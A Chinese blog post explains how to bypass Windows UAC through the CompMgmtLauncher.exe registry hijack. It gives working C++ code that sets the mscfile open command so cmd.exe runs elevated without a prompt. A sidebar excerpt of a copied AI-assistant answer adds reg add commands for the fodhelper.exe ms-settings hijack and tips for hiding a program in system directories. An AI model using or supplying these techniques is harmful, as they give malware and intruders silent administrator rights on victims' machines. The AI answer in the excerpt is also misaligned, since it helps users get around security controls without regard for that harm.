内网BypassUAC提权之CompMgmtLauncher程序

最新推荐文章于 2024-07-02 22:38:43 发布
原创 最新推荐文章于 2024-07-02 22:38:43 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #c++ #开发语言

本文介绍了一种利用CompMgmtLauncher程序绕过Windows UAC安全机制的方法,通过修改注册表项,使CompMgmtLauncher启动指定程序,实现权限提升。

文章目录

前言

      BypassUAC提权之CompMgmtLauncher程序。

一、CompMgmtLauncher的作用

     1)CompMgmtLauncher.exe程序在windows10中能直接双击打开并没有弹出让你点击确认的窗口,就是打开了计算机管理。在windows2019的服务器中也能直接打开,就是服务器管理器。CompMgmtLauncher.exe程序在windows中是白名单中的程序所以就可以用它来进行 Bypass UAC了。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
     2)在CompMgmtLauncher.exe启动的过程中,有一个关键的操作就是它会先读取注册表,注册表路径为:计算机\HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command的数据。打开系统注册表编辑器regedit.exe,查看相应路径下的注册表,发现该注册表路径确实不存在。所以,如果自己构造该注册路径,写入启动程序的路径,这样,CompMgmtLauncher.exe便会启动该程序。

二、利用CompMgmtLauncher绕过UAC

     1)编写C++文件。

#include <tchar.h>  
#include <windows.h>
#include <iostream>
using namespace std;

void bypass() {
    HKEY key;
    LPCSTR lpszFileName = "C:\\Windows\\System32\\cmd.exe";
    RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\classes\\mscfile\\shell\\open\\command", 0, NULL, 0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &key, NULL);
    if (key == NULL) {
        cout << "Error" << endl;
    }
    if (RegSetValueExA(key, NULL, 0, (DWORD)REG_SZ, (BYTE*)lpszFileName, strlen(lpszFileName) + 1) != ERROR_SUCCESS) {
        cout << "Error" << endl;

    }
    RegCloseKey(key);

}


int _tmain(int argc, _TCHAR* argv[])
{
    bypass();
    getchar();
    return 0;
}

在这里插入图片描述
     2)点击开始执行,然后利用everything搜索CompMgmtLauncher.exe程序并双击执行,发现弹出来的是标着计算机管理的cmd命令界面了而不是计算机管理界面了。成功绕过了UAC。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、背景(凑字用)

     UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。

     UAC需要授权的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到Program Files或Windows目录;查看其他用户文件夹等。

     在触发 UAC 时,系统会创建一个consent.exe进程,该进程通过白名单程序和用户选择来判断是否创建管理员权限进程。请求进程将要请求的进程cmdline和进程路径通过LPC接口传递给appinfo的RAiLuanchAdminProcess函数,该函数首先验证路径是否在白名单中,并将结果传递给consent.exe进程,该进程验证被请求的进程签名以及发起者的权限是否符合要求,然后决定是否弹出UAC框让用户进行确认。这个UAC框会创建新的安全桌面,屏蔽之前的界面。同时这个UAC框进程是SYSTEM权限进程,其他普通进程也无法和其进行通信交互。用户确认之后,会调用CreateProcessAsUser函数以管理员权限启动请求的进程。

     所以,病毒木马想要实现更多权限操作,那么就不得不绕过UAC弹窗,在没有通知用户情况下, 静默地将程序普通权限提升为管理员权限,从而程序可以实现一些需要权限的操作。目前实现Bypass UAC的方法主要有两种方法,一种是利用白名单提权机制,另一种是利用COM组件接口技术。

49-1 内网渗透 - Bypass UAC介绍
weixin_43263566的博客
06-24 242
在实际渗透测试中,如果测试人员能够绕过UAC机制,他们可以使非RID 500的管理员账户直接使用管理员访问令牌,而无需用户的明确批准。这种绕过并不是真正的权,因为并未增加用户的权限级别,而是利用漏洞或技术手段绕过了UAC的确认示,获取了管理员权限。需要注意的是,UAC本身是一种权限保护机制,而Bypass UAC只是一种绕过这一保护的技术手段,不会实质性地增加用户的权限级别。(除了内置的Administrator账户),当他们登录时,系统会为其分配两个访问令牌:标准用户访问令牌和管理员访问令牌。
通过Bypass UAC进行权限
渗透之路,攻防之间皆学问
01-30 8220
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授权的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授权管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
Compmgmtlauncher.exe导致CPU占用100%问题解决方法
09-28
Compmgmtlauncher.exe导致CPU占用100%问题解决方法
CompMgmtLauncher.exe
12-12
CompMgmtLauncher
win8.1打开管理弹出CompMgmtLauncher错误解决办法
09-22
win8.1打开管理弹出CompMgmtLauncher错误,没此点击这台电脑-右键管理就弹窗,这是解决办法
Windows系统缺失wpnapps.dll文件如何解决?
amio555的专栏
07-03 1786
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个wpnapps.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现wpnapps.dll丢失要怎么解决?
【已解决】右键文件夹出现白屏闪退——CompMgmtLauncher.exe出错
weixin_55017489的博客
06-23 6468
解决文件夹出现白屏闪退的问题!CompMgmtLauncher.exe出错
权技术之Bypass UAC
weixin_42071117的博客
10-19 1061
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员权限下的安全上下文中运行。 // 除非特别授予管理员权限。UAC可以阻止未经授权的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授权的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
ByPass UAC
yeanhoo的博客
09-24 1378
ByPass UAC 白名单程序 Bypass UAC 有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC权操作 利用CompMgmtLauncher.exe、该程序在启动时会查询注册
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之权技术(令牌权限升和Bypass UAC)
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒权技术,包括进程访问令牌权限升和Bypass UAC,希望对您有所帮助。
WIN7的管理和CompMgmtLauncher.exe进程
karnaugh的专栏
11-14 860
<br />装了优化大师了吧 反注册优化大师加密组件就行<br />用管理员身份运行命令示符 找到优化大师的路径X:/Program Files/Wopti 输入regsvr32 /u WoptiEncryptModule.dll 回车即可<br />如果启动 计算机 管理,还是CompMgmtLauncher.exe进程占用率很高的话,就直接卸载优化大师就肯定能解决。<br /> 
Windows7系统CompMgmtLauncher.exe文件丢失问题
amio555的专栏
03-12 512
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个CompMgmtLauncher.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现CompMgmtLauncher.exe丢失要怎么解决?
Windows7下我的电脑右键"管理"故障,以及CompMgmtLauncher.exe占用高的问题
weixin_43630492的博客
01-13 1281
每次运行“我的电脑”-“管理”后,任务管理器里总会出现CompMgmtLauncher.exe(C:\windows\system32下),总是会弹出警告框示用户没 有与之关联的程序,且关闭“管理”后,CPU的占用率始终较高,程序没有关闭。首先,我们可以通过经验判断,我的电脑右键的特定功能是储存在注册表中的,那么就从注册表开刀。但是具体在注册表什么位置呢?通过查找我们...
电脑计算机管理打开错误,右键打开wndows7计算机管理就显示CompMgmtLauncher.exe错误的解决办法...
weixin_30639241的博客
07-11 1623
这是因为安装了windows优化大师的原因 反注册优化大师加密组件就行用管理员身份运行命令示符cmd 找到优化大师的路径X:\Program Files\Wopti 输入regsvr32 /uWoptiEncryptModule.dll 回车即可还有一种方法是修改注册表解决:修改注册表:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B...
Win7系统示找不到CompMgmtLauncher.exe文件的解决办法
file
02-25 1339
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个CompMgmtLauncher.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现CompMgmtLauncher.exe丢失要怎么解决?
Compmgmtlauncher.exe问题解决方法
weixin_30483697的博客
03-26 4313
修改注册表:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command原来的默认键值为:%SystemRoot%\system32\CompMgmtLauncher.exe修改其为:%SystemRoot%\system32\mmc compmgmt.msc 转载于:http...
解决CompMgmtLauncher.exe CPU占用过高问题
liguo9860的专栏
10-22 5374
这是右键计算机再点管理后出现的进程,有人说是与优化大师有关。 解决办法: 在注册表里找到: HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command 原来的默认键值为:%SystemRoot%\system32\CompMgmtLauncher.exe 修改其为:%S
内网渗透第四天!!!冲冲冲!!怎么绕过uac以及你会dll劫持???不安全的服务路径以及服务权限,你会吗???
helloKittywz的博客
07-02 1294
上面我们简单的说了一下绕过uac,但是我们使用的msf模块ask要对方管理员跟我们一起来进行操作,才可以进行权的操作,这点就限制住了我们。我们今天来讲一下不用钓鱼的绕过的操作。
如何添加注册表项,使那个程序在UAC白名单里
最新发布
04-28
<think>好的,我现在需要帮助用户了解如何通过修改注册表将程序添加到Windows 11的UAC白名单,以避免弹窗。用户之前已经询问过相关方法,现在他们希望更具体地通过注册表来实现这一点。我需要结合用户供的引用信息,特别是引用[1]中到的白名单进程的条件,以及之前回答中的方法,比如注册表劫持。 首先,我得明确用户的需求:通过添加注册表项,让他们的程序被系统视为白名单程序,从而绕过UAC弹窗。根据引用[1],系统白名单程序位于系统目录,如System32,并且需要微软的数字签名。但用户可能没有这些条件,所以可能需要替代方法。 在之前的回答中,我到了方法1,即劫持白名单程序的注册表路径,例如compmgmtlauncher.exe。这需要修改注册表,将某个白名单程序调用的命令指向用户的程序。用户现在可能希望更详细地了解如何具体操作注册表项,包括步骤和注意事项。 我需要确保步骤清晰,并指出潜在的风险,比如安全性和系统更新的影响。同时,需要强调用户程序需要满足的条件,比如路径和数字签名,虽然用户可能无法获得微软的签名,但可以到自签名证书的可能。 另外,用户可能误解可以通过直接添加注册表项来加入白名单,但实际上这是不可能的,必须通过间接方法,如劫持现有的白名单程序。因此,在回答中需要澄清这一点,避免用户尝试无效的方法。 还要考虑用户的技术水平,是否需要命令行或脚本示例,比如reg add命令或PowerShell脚本,以帮助他们具体实施。同时,醒他们需要管理员权限来修改注册表,以及操作前备份注册表的重要性。 最后,确保回答结构清晰,分步骤说明,并包含注意事项和相关问题,帮助用户进一步理解可能的问题和解决方案。</think>#### 核心原理说明 Windows UAC白名单程序需满足**双重条件**: 1. **程序路径**:位于系统目录(如$C:\Windows\System32$)[^1] 2. **数字签名**:包含微软官方签名(如$taskmgr.exe$、$compmgmtlauncher.exe$等)[^1] **用户无法直接通过注册表将任意程序加入白名单**,但可通过注册表劫持实现类似效果。以下是技术实现细节: --- ### 分步操作指南 #### 方法:注册表路径劫持(以$fodhelper.exe$为例) **原理**:利用白名单程序$fodhelper.exe$默认调用的注册表键值,将其重定向到目标程序。 1. **定位劫持点** - 白名单程序:$fodhelper.exe$(微软官方签名程序) - 关联注册表项:`HKCU\Software\Classes\ms-settings\shell\open\command` 2. **创建劫持注册表项** ```cmd :: 创建注册表键值(需管理员权限) reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "" /t REG_SZ /d "C:\YourApp\program.exe" /f ``` > *将`program.exe`替换为你的程序绝对路径* 3. **触发执行** ```powershell Start-Process fodhelper.exe ``` - 系统将自动以**静默权模式**运行你的程序,**无UAC弹窗**[^1][^4] --- ### 技术验证条件 | 验证项 | 必要条件 | |------------------|-----------------------------| | 目标程序路径 | 需存在于有效文件系统路径 | | 注册表权限 | 当前用户需有写权限(HKCU分支)| | 数字签名 | 非强制要求但建议有基础签名 | --- ### 关键风险示 1. **安全机制绕过**:此方法会被Windows Defender标记为`Exploit:Win32/RegHijack`威胁 2. **系统更新失效**:Windows 11 22H2后增加了对`ms-settings`键值的保护机制 3. **程序兼容性**:需保持劫持程序路径与注册表设置完全一致 --- ### 进阶方案(长期稳定) 若需长期免UAC运行,建议结合以下技术: 1. **程序签名**:使用EV代码签名证书(如Sectigo/Symantec) 2. **路径伪装**:将程序放入`C:\Windows\System32\CompatibilityAssessment\`等特殊目录 3. **服务封装**:通过Windows服务托管程序(需SCM权限) --- #### 相关问题 1. 如何检测注册表劫持型UAC绕过攻击? 2. Windows Defender如何拦截注册表键值篡改? 3. 哪些白名单程序支持静默权操作?
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值